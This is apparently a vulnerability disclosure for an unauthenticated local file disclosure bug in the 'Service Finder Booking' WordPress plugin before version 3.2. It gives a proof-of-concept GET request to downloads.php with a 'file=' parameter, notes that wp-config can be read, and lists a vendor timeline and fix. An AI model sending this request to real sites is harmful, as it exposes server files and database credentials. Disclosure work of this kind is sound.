# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure# Google Dork: N/A# Date: 09/01/2018 (GMT+7)# Exploit Author: telahdihapus# Vendor Homepage: https://themeforest.net/user/aonetheme# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793# Tested on: windows 101. description :
unauthenticated user can access downloads.php,and can disclosure filein server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config,orelsefile2. POC :
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
3. timeline
- jan 1,2018 report vendor
- jan 1,2018 vendor send email
- jan 1,2018 send poc
- jan 2,2018 vendor contact team
- jan 8,2018 vendor send email about fixed issue
4. solution :
update to version 3.2
